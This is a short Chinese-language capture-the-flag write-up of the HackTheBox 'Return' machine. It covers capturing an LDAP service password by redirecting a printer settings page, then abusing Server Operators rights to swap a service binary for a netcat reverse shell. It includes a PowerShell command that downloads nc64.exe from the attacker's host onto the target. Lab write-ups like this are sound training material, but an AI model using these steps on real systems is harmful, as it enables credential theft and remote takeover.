htb return复盘
这个靶机比较简单,就边做边记录了📝
参考链接
官方wp
https://zhuanlan.zhihu.com/p/440073688
https://blog.csdn.net/Purpose_7/article/details/128562358
靶机信息
地址:https://app.hackthebox.com/machines/Return
难度:我觉得比easy还easy
ip:10.10.11.108
信息搜集
扫到很多端口,先看看80端口,有个setting.php,起始长这样
像是在配置一个服务,需要填address,389对于ldap服务
思路是把地址改成本地ip,本地开启监听389端口,点击update,收到一串密码
用来登录svc-printer账户,没想到第一个flag拿的这么轻松
提权
看一下svc-printer账户详情
他有Server Operator权限,“Members of this group can start/stop system services”
那接下来的思路就是上传一个nc.exe,停止某个服务,修改某个服务的路径,再启动服务,就会反弹shell
这里选的服务是Windows自带的卷影复制服务vss
1 | powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3/nc64.exe','C:\Users\svc-printer\desktop\nc.exe')" |
总结
目前遇到最简单的windows靶机,虽然开了很多端口但是没什么用,学习到Server Operator权限相关内容,不错